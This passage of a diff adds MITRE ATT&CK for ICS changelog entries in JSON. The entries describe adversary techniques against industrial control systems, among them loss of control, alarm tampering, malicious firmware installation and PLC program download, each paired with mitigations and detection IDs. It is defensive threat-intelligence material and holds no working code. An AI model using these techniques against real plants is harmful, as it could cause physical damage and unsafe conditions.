+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0798: Detection of Hardcoded Credentials"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Loss of Control",
+                    "description": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0827",
+                            "external_id": "T0827"
+                        },
+                        {
+                            "source_name": "BSI State of IT Security 2014",
+                            "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ",
+                            "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3"
+                        },
+                        {
+                            "source_name": "Corero",
+                            "description": "Corero   Industrial Control System (ICS) Security Retrieved. 2019/11/04 ",
+                            "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"
+                        },
+                        {
+                            "source_name": "Michael J. Assante and Robert M. Lee",
+                            "description": "Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25",
+                            "url": "https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf"
+                        },
+                        {
+                            "source_name": "Tyson Macaulay",
+                            "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero   Industrial Control System (ICS) Security Retrieved. 2019/11/04  The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04  RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ",
+                            "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-04-15 19:58:56.356000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0811: Redundancy of Service",
+                            "M0953: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0778: Detection of Loss of Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Loss of View",
+                    "description": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0829",
+                            "external_id": "T0829"
+                        },
+                        {
+                            "source_name": "Corero",
+                            "description": "Corero   Industrial Control System (ICS) Security Retrieved. 2019/11/04 ",
+                            "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"
+                        },
+                        {
+                            "source_name": "Michael J. Assante and Robert M. Lee",
+                            "description": "Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25",
+                            "url": "https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf"
+                        },
+                        {
+                            "source_name": "Tyson Macaulay",
+                            "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero   Industrial Control System (ICS) Security Retrieved. 2019/11/04  The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04  RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ",
+                            "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-04-15 19:58:08.228000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0811: Redundancy of Service",
+                            "M0953: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0763: Detection of Loss of View"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Modify Alarm Settings",
+                    "description": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. \n\nIf an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. \n\nIn ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019)  Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0838",
+                            "external_id": "T0838"
+                        },
+                        {
+                            "source_name": "Jos Wetzels, Marina Krotofil 2019",
+                            "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ",
+                            "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-04-16 21:26:19.764000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0918: User Account Management",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0777: Detection of Modify Alarm Settings"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7b4c0e19-a9b0-4a74-a196-b38c07b79f20",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:50:34.850000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Modify Firmware",
+                    "description": "Firmware is low-level software embedded in hardware that enables systems and devices to function properly and is commonly found in ICS environments. Adversaries may modify firmware on a system or device by installing malicious or vulnerable versions that enable them to achieve objectives such as [Persistence](https://attack.mitre.org/tactics/TA0110), [Impair Process Control](https://attack.mitre.org/tactics/TA0106), and [Inhibit Response Function](https://attack.mitre.org/tactics/TA0107). \n\nAdversaries may modify system and device firmware by using the built-in firmware update functionality which may support local or remote installation. The malicious or vulnerable firmware may be delivered via [Replication Through Removable Media](https://attack.mitre.org/techniques/T0847), [Supply Chain Compromise](https://attack.mitre.org/techniques/T0862), or [Remote Services](https://attack.mitre.org/techniques/T0886). Once installed, the malicious or vulnerable firmware could be used to provide [Rootkit](https://attack.mitre.org/techniques/T0851) and [Hooking](https://attack.mitre.org/techniques/T0874) functionality, [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T0890), or [Denial of Service](https://attack.mitre.org/techniques/T0814).(Citation: Basnight, Zachry, et al.)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impair-process-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1693",
+                            "external_id": "T1693"
+                        },
+                        {
+                            "source_name": "Basnight, Zachry, et al.",
+                            "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ",
+                            "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2026-04-23 19:06:21.253000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0808: Encrypt Network Traffic",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0941: Encrypt Sensitive Information",
+                            "M0945: Code Signing",
+                            "M0946: Boot Integrity",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0904: Detection of Firmware Modification"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--75587e49-ab7e-44df-9549-faeb1da57f39",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:18.535000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Module Firmware",
+                    "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment.\n\nThis technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices.(Citation: Daniel Peck,  Dale Peterson January 2009)\n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following:(Citation: Daniel Peck,  Dale Peterson January 2009)\n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time.\n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return.\n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator.\n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise.\n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impair-process-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1693/002",
+                            "external_id": "T1693.002"
+                        },
+                        {
+                            "source_name": "Daniel Peck,  Dale Peterson January 2009",
+                            "description": "Daniel Peck,  Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ",
+                            "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2026-04-23 19:15:57.683000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0808: Encrypt Network Traffic",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0941: Encrypt Sensitive Information",
+                            "M0945: Code Signing",
+                            "M0946: Boot Integrity",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0790: Detection of Module Firmware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--68a9324d-a524-4766-a899-a026f68a33df",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:18.031000+00:00",
+                    "modified": "2026-05-12 15:12:00.639000+00:00",
+                    "name": "System Firmware",
+                    "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network.\n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers.(Citation: Basnight, Zachry, et al.)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impair-process-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1693/001",
+                            "external_id": "T1693.001"
+                        },
+                        {
+                            "source_name": "Basnight, Zachry, et al.",
+                            "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ",
+                            "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.639000+00:00\", \"old_value\": \"2026-04-23 19:10:31.871000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0808: Encrypt Network Traffic",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0941: Encrypt Sensitive Information",
+                            "M0945: Code Signing",
+                            "M0946: Boot Integrity",
+                            "M0947: Audit",
+                            "M0951: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0731: Detection of System Firmware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Network Connection Enumeration",
+                    "description": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network  (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0840",
+                            "external_id": "T0840"
+                        },
+                        {
+                            "source_name": "MITRE",
+                            "description": "MITRE   System Network Connections Discovery Retrieved. 2018/05/31 ",
+                            "url": "https://attack.mitre.org/wiki/Technique/T1049"
+                        },
+                        {
+                            "source_name": "Netstat",
+                            "description": "Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.",
+                            "url": "https://en.wikipedia.org/wiki/Netstat"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-04-15 19:59:18.381000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0816: Mitigation Limited or Not Effective"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0770: Detection of Network Connection Enumeration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Program Download",
+                    "description": "Adversaries may perform a program download to transfer a user program to a controller. \n\nVariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download.\n\nThe granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space.  \n\n[Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0843",
+                            "external_id": "T0843"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2025-04-16 21:26:18.212000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0945: Code Signing",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0752: Detection of Program Download"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--77015a55-eef8-4f71-a071-b152f82ec1ef",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:23.982000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Download All",
+                    "description": "Adversaries may execute a full program download to a PLC to overwrite the entire PLC program and configuration to deploy a new project or make major changes. This typically requires stopping the PLC and adversely impacting control processes.\n\nThe ability to perform a full program download to the PLC typically relies on access to a workstation with the vendor-specific PLC programming software installed.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0843/001",
+                            "external_id": "T0843.001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2026-04-23 00:01:28.898000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
